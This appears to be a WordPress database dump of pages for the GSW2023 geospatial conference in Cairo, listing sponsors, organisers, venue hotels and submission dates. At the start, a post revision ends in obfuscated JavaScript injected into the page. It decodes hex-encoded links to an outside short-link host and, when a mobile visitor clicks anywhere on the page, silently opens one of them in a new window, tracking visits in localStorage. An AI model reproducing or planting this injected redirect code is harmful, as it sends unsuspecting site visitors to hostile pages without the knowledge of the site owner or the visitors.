_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:25:01','2023-06-09 14:25:01','',3066,'https://gsw2023.com/?p=4649',0,'revision','',0),
(4650,1,'2023-06-09 14:25:28','2023-06-09 14:25:28','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" 